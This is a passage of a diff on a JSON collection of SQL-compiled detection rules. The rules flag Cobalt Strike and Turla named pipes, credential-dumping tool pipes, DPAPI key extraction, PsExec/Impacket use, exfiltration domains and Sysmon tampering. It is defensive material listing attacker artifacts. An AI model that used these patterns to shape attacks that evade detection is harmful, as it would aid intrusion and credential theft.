"0d18728b-f5bf-4381-9dcf-915539fff6c2", + "title": "CobaltStrike Named Pipe Pattern Regex", + "id": "0e7163d4-9e19-4fa7-9be6-000c61aad77a", "status": "test", - "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1071.004" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (PipeName REGEXP '\\\\mojo\\.5688\\.8052\\.(?:183894939787088877|35780273329370473)[0-9a-f]{2}' OR PipeName REGEXP '\\\\wkssvc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\ntsvcs[0-9a-f]{2}' OR PipeName REGEXP '\\\\DserNamePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\SearchTextHarvester[0-9a-f]{2}' OR PipeName REGEXP '\\\\mypipe-(?:f|h)[0-9a-f]{2}' OR PipeName REGEXP '\\\\windows\\.update\\.manager[0-9a-f]{2,3}' OR PipeName REGEXP '\\\\ntsvcs_[0-9a-f]{2}' OR PipeName REGEXP '\\\\scerpc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\PGMessagePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\MsFteWds[0-9a-f]{2}' OR PipeName REGEXP '\\\\f4c3[0-9a-f]{2}' OR PipeName REGEXP '\\\\fullduplex_[0-9a-f]{2}' OR PipeName REGEXP '\\\\msrpc_[0-9a-f]{4}' OR PipeName REGEXP '\\\\win\\\\msrpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\f53f[0-9a-f]{2}' OR PipeName REGEXP '\\\\rpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\spoolss_[0-9a-f]{2}' OR PipeName REGEXP '\\\\Winsock2\\\\CatalogChangeListener-[0-9a-f]{3}-0,')" ], - "filename": "win_dns_client__mal_cobaltstrike.yml" + "filename": "pipe_created_mal_cobaltstrike_re.yml" }, { - "title": "DNS Query for Anonfiles.com Domain - DNS Client", - "id": "29f171d7-aa47-42c7-9c7b-3c87938164d9", - "status": "experimental", - "description": "Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "ADFS Database Named Pipe Connection", + "id": "1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3", + "status": "test", + "description": "Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database).\nUsed to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.\n", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.collection", + "attack.t1005" ], "falsepositives": [ - "Rare legitimate access to anonfiles.com" + "Processes in the filter condition" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.anonfiles.com%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (PipeName LIKE '\\\\MICROSOFT##WID\\\\tsql\\\\query' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft.IdentityServer.ServiceHost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Identity.Health.Adfs.PshSurrogate.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AzureADConnect.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Tri.Sensor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tssdis.exe' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\')))" ], - "filename": "win_dns_client_anonymfiles_com.yml" + "filename": "pipe_created_susp_adfs_namedpipe_connection.yml" }, { - "title": "DNS Query for Ufile.io Upload Domain - DNS Client", - "id": "090ffaad-c01a-4879-850c-6d57da98452d", - "status": "experimental", - "description": "Detects DNS queries to \"ufile.io\". Which is often abused by malware for upload and exfiltration", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Turla Group Named Pipes", + "id": "739915e4-1e70-4778-8b8a-17db02f66db1", + "status": "test", + "description": "Detects a named pipe used by Turla group samples", + "author": "Markus Neis", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.g0010", + "attack.execution", + "attack.t1106" ], "falsepositives": [ - "Legitimate DNS queries and usage of Ufile" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%ufile.io%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (PipeName LIKE '\\\\atctl' ESCAPE '\\' OR PipeName LIKE '\\\\userpipe' ESCAPE '\\' OR PipeName LIKE '\\\\iehelper' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\comnap' ESCAPE '\\')" ], - "filename": "win_dns_client_ufile_io.yml" + "filename": "pipe_created_apt_turla_namedpipes.yml" }, { - "title": "Query Tor Onion Address - DNS Client", - "id": "8384bd26-bde6-4da9-8e5d-4174a7a47ca2", + "title": "CobaltStrike Named Pipe Patterns", + "id": "85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7", "status": "test", - "description": "Detects DNS resolution of an .onion address related to Tor routing networks", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles", + "author": "Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090.003" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ - "Unlikely" + "Chrome instances using the exact same pipe name \"mojo.something\"" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.onion%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((((PipeName LIKE '\\\\mojo.5688.8052.183894939787088877%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo.5688.8052.35780273329370473%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-f%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-h%' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs%' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\_svc%' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss%' ESCAPE '\\' OR PipeName LIKE '\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc%' ESCAPE '\\' OR PipeName LIKE '\\\\f53f%' ESCAPE '\\' OR PipeName LIKE '\\\\windows.update.manager%' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester%' ESCAPE '\\' OR PipeName LIKE '\\\\DserNamePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds%' ESCAPE '\\' OR PipeName LIKE '\\\\f4c3%' ESCAPE '\\' OR PipeName LIKE '\\\\fullduplex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\rpc\\_%' ESCAPE '\\') OR (PipeName LIKE '\\\\demoagent\\_11' ESCAPE '\\' OR PipeName LIKE '\\\\demoagent\\_22' ESCAPE '\\')) OR (PipeName LIKE '\\\\Winsock2\\\\CatalogChangeListener-%' ESCAPE '\\' AND PipeName LIKE '%-0,' ESCAPE '\\')) AND NOT ((PipeName LIKE '\\\\wkssvc' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds' ESCAPE '\\')))" ], - "filename": "win_dns_client_tor_onion.yml" + "filename": "pipe_created_susp_cobaltstrike_pipe_patterns.yml" }, { - "title": "Protected Storage Service Access", - "id": "45545954-4016-43c6-855e-eae8f1c369dc", + "title": "CobaltStrike Named Pipe", + "id": "d5601f8c-b26f-4ab0-9035-69e11a8d4ad2", "status": "test", - "description": "Detects access to a protected_storage service over the network. Potential abuse of DPAPI to extract domain backup keys from Domain Controllers", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects the creation of a named pipe as used by CobaltStrike", + "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '%IPC%' ESCAPE '\\' AND RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((PipeName LIKE '%\\\\MSSE-%' ESCAPE '\\' AND PipeName LIKE '%-server%' ESCAPE '\\') OR PipeName LIKE '\\\\postex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\status\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\msagent\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\interprocess\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\samr\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\netlogon\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\srvsvc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\lsarpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc\\_%' ESCAPE '\\')" ], - "filename": "win_security_protected_storage_service_access.yml" + "filename": "pipe_created_mal_cobaltstrike.yml" }, { - "title": "DPAPI Domain Backup Key Extraction", - "id": "4ac1f50b-3bd0-4968-902d-868b4647937e", - "status": "test", - "description": "Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "PsExec Tool Execution From Suspicious Locations - PipeName", + "id": "41504465-5e3a-4a5b-a5b4-2a0baadd4463", + "status": "experimental", + "description": "Detects PsExec default pipe creation where the image executed is located in a suspicious location. Which could indicate that the tool is being used in an attack", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.004" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Unknown" + "Rare legitimate use of psexec from the locations mentioned above" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectType = 'SecretObject' AND AccessMask = '0x2' AND ObjectName LIKE '%BCKUPKEY%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (PipeName LIKE '\\\\PSEXESVC' ESCAPE '\\' AND (NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "win_security_dpapi_domain_backupkey_extraction.yml" + "filename": "pipe_created_psexec_default_pipe_from_susp_location.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security", - "id": "4c54ba8f-73d2-4d40-8890-d9cf1dca3d30", - "status": "test", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "title": "DiagTrackEoP Default Named Pipe", + "id": "1f7025a6-e747-4130-aac4-961eb47015f1", + "status": "experimental", + "description": "Detects creation of default named pipe used by the DiagTrackEoP POC", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.privilege_escalation" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE PipeName LIKE '%thisispipe%' ESCAPE '\\'" + ], + "filename": "pipe_created_diagtrack_eop_default_pipe.yml" + }, + { + "title": "EfsPotato Named Pipe", + "id": "637f689e-b4a5-4a86-be0e-0100a0a33ba2", + "status": "experimental", + "description": "Detects the pattern of a pipe name as used by the tool EfsPotato", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&set%' ESCAPE '\\' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%{0}%' ESCAPE '\\' OR ServiceFileName LIKE '%{1}%' ESCAPE '\\' OR ServiceFileName LIKE '%{2}%' ESCAPE '\\' OR ServiceFileName LIKE '%{3}%' ESCAPE '\\' OR ServiceFileName LIKE '%{4}%' ESCAPE '\\' OR ServiceFileName LIKE '%{5}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((PipeName LIKE '%\\\\pipe\\\\%' ESCAPE '\\' OR PipeName LIKE '%\\\\pipe\\\\srvsvc%' ESCAPE '\\') AND NOT (PipeName LIKE '%\\\\CtxShare%' ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_via_var_services_security.yml" + "filename": "pipe_created_efspotato_namedpipe.yml" }, { - "title": "Suspicious Windows ANONYMOUS LOGON Local Account Created", - "id": "1bbf25b9-8038-4154-a50b-118f2a32be27", + "title": "WMI Event Consumer Created Named Pipe", + "id": "493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb", "status": "test", - "description": "Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.", - "author": "James Pemberton / @4A616D6573", + "description": "Detects the WMI Event Consumer service scrcons.exe creating a named pipe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1136.001", - "attack.t1136.002" + "attack.t1047", + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND SamAccountName LIKE '%ANONYMOUS%' ESCAPE '\\' AND SamAccountName LIKE '%LOGON%' ESCAPE '\\')" + "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\'" ], - "filename": "win_security_susp_local_anon_logon_created.yml" + "filename": "pipe_created_susp_wmi_consumer_namedpipe.yml" }, { - "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - Security", - "id": "ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34", - "status": "test", - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "title": "Koh Default Named Pipes", + "id": "0adc67e0-a68f-4ffd-9c43-28905aad5d6a", + "status": "experimental", + "description": "Detects creation of default named pipes used by the Koh tool", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" + "attack.credential_access", + "attack.t1528", + "attack.t1134.001" ], "falsepositives": [ - "Highly unlikely" + "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%cmd.exe%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%.dll,a%' ESCAPE '\\' AND ServiceFileName LIKE '%/p:%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (PipeName LIKE '%\\\\imposecost%' ESCAPE '\\' OR PipeName LIKE '%\\\\imposingcost%' ESCAPE '\\')" ], - "filename": "win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml" + "filename": "pipe_created_koh_default_pipe.yml" }, { - "title": "Disabling Windows Event Auditing", - "id": "69aeb277-f15f-4d2d-b32a-55e883609563", + "title": "Cred Dump-Tools Named Pipes", + "id": "961d0ba2-3eea-4303-a930-2cf78bbfcc5e", "status": "test", - "description": "Detects scenarios where system auditing (ie: windows event log auditing) is disabled.\nThis may be used in a scenario where an entity would want to bypass local logging to evade detection when windows event logging is enabled and reviewed.\nAlso, it is recommended to turn off \"Local Group Policy Object Processing\" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as \"gpedit.msc\".\nPlease note, that disabling \"Local Group Policy Object Processing\" may cause an issue in scenarios of one off specific GPO modifications -- however it is recommended to perform these modifications in Active Directory anyways.\n", - "author": "@neu5ron", + "description": "Detects well-known credential dumping tools execution via specific named pipes", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator using tool for password recovery" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4719' AND (AuditPolicyChanges LIKE '%\\%\\%8448%' ESCAPE '\\' OR AuditPolicyChanges LIKE '%\\%\\%8450%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (PipeName LIKE '%\\\\lsadump%' ESCAPE '\\' OR PipeName LIKE '%\\\\cachedump%' ESCAPE '\\' OR PipeName LIKE '%\\\\wceservicepipe%' ESCAPE '\\')" ], - "filename": "win_security_disable_event_logging.yml" + "filename": "pipe_created_cred_dump_tools_named_pipes.yml" }, { - "title": "Metasploit Or Impacket Service Installation Via SMB PsExec", - "id": "6fb63b40-e02a-403e-9ffd-3bcc1d749442", + "title": "Sysmon Configuration Error", + "id": "815cd91b-7dbc-4247-841a-d7dd1392b0a8", "status": "experimental", - "description": "Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation", - "author": "Bartlomiej Czyz, Relativity", + "description": "Detects when an adversary is trying to hide it's action from Sysmon logging based on error messages", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1570", - "attack.execution", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1564" ], "falsepositives": [ - "Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name" + "Legitimate administrative action" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4697' AND ServiceFileName REGEXP '^%systemroot%\\\\[a-zA-Z]{8}\\.exe$' AND ServiceName REGEXP '(^[a-zA-Z]{4}$)|(^[a-zA-Z]{8}$)|(^[a-zA-Z]{16}$)' AND ServiceStartType = '3' AND ServiceType = '0x10') AND NOT (ServiceName = 'PSEXESVC'))" + "SELECT * FROM logs WHERE ((Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' OR Description LIKE '%Failed to connect to the driver to update configuration%' ESCAPE '\\') AND NOT ((Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' AND Description LIKE '%Last error: The media is write protected.%' ESCAPE '\\') OR ((Description LIKE '%Failed to open service configuration with error 19%' ESCAPE '\\' OR Description LIKE '%Failed to open service configuration with error 93%' ESCAPE '\\'))))" ], - "filename": "win_security_metasploit_or_impacket_smb_psexec_service_install.yml" + "filename": "sysmon_config_modification_error.yml" }, { - "title": "Suspicious LDAP-Attributes Used", - "id": "d00a9a72-2c09-4459-ad03-5e0a23351e36", - "status": "test", - "description": "Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.", - "author": "xknow @xknow_infosec", + "title": "Sysmon Blocked Executable", + "id": "23b71bc5-953e-4971-be4c-c896cda73fc2", + "status": "experimental", + "description": "Triggers on any Sysmon file block executable event. Which should indicates a violation of the block policy set", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1001.003", - "attack.command_and_control" + "attack.defense_evasion" ], "falsepositives": [ - "Companies, who may use these default LDAP-Attributes for personal information" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeValue LIKE '%' ESCAPE '\\' AND AttributeLDAPDisplayName IN ('primaryInternationalISDNNumber', 'otherFacsimileTelephoneNumber', 'primaryTelexNumber'))" + "SELECT * FROM logs WHERE EventID = '27'" ], - "filename": "win_security_susp_ldap_dataexchange.yml" + "filename": "sysmon_file_block_exe.yml" }, { - "title": "Malicious Service Installations", - "id": "cb062102-587e-4414-8efa-dbe3c7bf19c6", - "status": "test", - "description": "Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.", - "author": "Florian Roth (Nextron Systems), Daniil Yugoslavskiy, oscd.community (update)", + "title": "Sysmon Process Hollowing Detection", + "id": "c4b890e5-8d8c-4496-8c66-c805753817cd", + "status": "experimental", + "description": "Detects when a memory process image does not match the disk image, indicative of process hollowing.", + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Sittikorn S", "tags": [ - "attack.persistence", + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1003", - "car.2013-09-005", - "attack.t1543.003", - "attack.t1569.002" + "attack.t1055.012" ], "falsepositives": [ - "Unknown" + "There are no known false positives at this time" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'javamtsup')" + "SELECT * FROM logs WHERE (Type = 'Image is replaced' AND NOT ((NewProcessName LIKE '%:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Program Files (x86)%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WMIADAP.exe' ESCAPE '\\')))" ], - "filename": "win_security_mal_service_installs.yml" + "filename": "sysmon_process_hollowing.yml" }, { - "title": "AD Object WriteDAC Access", - "id": "028c7842-4243-41cd-be6f-12f3cf1a26c7", + "title": "Sysmon Configuration Modification", + "id": "1f2b5353-573f-4880-8e33-7d04dcf97744", "status": "test", - "description": "Detects WRITE_DAC access to a domain object", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects when an attacker tries to hide from Sysmon by disabling or stopping it", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1222.001" + "attack.t1564" ], "falsepositives": [ - "Unknown" + "Legitimate administrative action" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectServer = 'DS' AND AccessMask = '0x40000' AND ObjectType IN ('19195a5b-6da0-11d0-afd3-00c04fd930c9', 'domainDNS'))" + "SELECT * FROM logs WHERE ((State = 'Stopped' OR logs MATCH ('\"Sysmon config state changed\"')) AND NOT (State = 'Started'))" ], - "filename": "win_security_ad_object_writedac_access.yml" + "filename": "sysmon_config_modification_status.yml" }, { - "title": "Suspicious Teams Application Related ObjectAcess Event", - "id": "25cde13e-8e20-4c29-b949-4e795b76f16f", + "title": "Prefetch File Deleted", + "id": "0a1f9d29-6465-4776-b091-7f43b26e4c89", "status": "experimental", - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", - "author": "@SerkinValery", + "description": "Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence", + "author": "Cedric MAURUGEON", "tags": [ - "attack.credential_access", - "attack.t1528" + "attack.defense_evasion", + "attack.t1070.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4663' AND (ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\')) AND NOT (ProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows\\\\Prefetch\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.pf' ESCAPE '\\') AND NOT (NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "win_security_teams_suspicious_objectaccess.yml" + "filename": "file_delete_win_delete_prefetch.yml" }, { - "title": "Metasploit SMB Authentication", - "id": "72124974-a68b-4366-b990-d30e0b2a190d", - "status": "test", - "description": "Alerts on Metasploit host's authentications on the domain.", - "author": "Chakib Gzenayi (@Chak092), Hosni Mribah", + "title": "Potential PrintNightmare Exploitation Attempt", + "id": "5b2bbc47-dead-4ef7-8908-0cf73fcbecbf", + "status": "experimental", + "description": "Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675", + "author": "Bhabesh Raj", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574", + "cve.2021.1675" ], "falsepositives": [ - "Linux hostnames composed of 16 characters." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID IN ('4625', '4624') AND LogonType = '3' AND AuthenticationPackageName = 'NTLM' AND WorkstationName REGEXP '^[A-Za-z0-9]{16}$') OR (ProcessName = '' AND EventID = '4776' AND Workstation REGEXP '^[A-Za-z0-9]{16}$')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\%' ESCAPE '\\')" ], - "filename": "win_security_metasploit_authentication.yml" + "filename": "file_delete_win_cve_2021_1675_print_nightmare.yml" }, { - "title": "Impacket PsExec Execution", - "id": "32d56ea1-417f-44ff-822b-882873f5f43b", - "status": "test", - "description": "Detects execution of Impacket's psexec.py.", - "author": "Bhabesh Raj", + "title": "Unusual File Deletion by Dns.exe", + "id": "8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0", + "status": "experimental", + "description": "Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "author": "Tim Rauch (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%RemCom\\_stdin%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stdout%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stderr%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" ], - "filename": "win_security_impacket_psexec.yml" + "filename": "file_delete_win_unusual_deletion_by_dns_exe.yml" }, { - "title": "Password Protected ZIP File Opened (Suspicious Filenames)", - "id": "54f0434b-726f-48a1-b2aa-067df14516e4", + "title": "Exchange PowerShell Cmdlet History Deleted", + "id": "a55349d8-9588-4c5a-8e3b-1925fe2a4ffe", "status": "experimental", - "description": "Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened.", - "author": "Florian Roth (Nextron Systems)", + 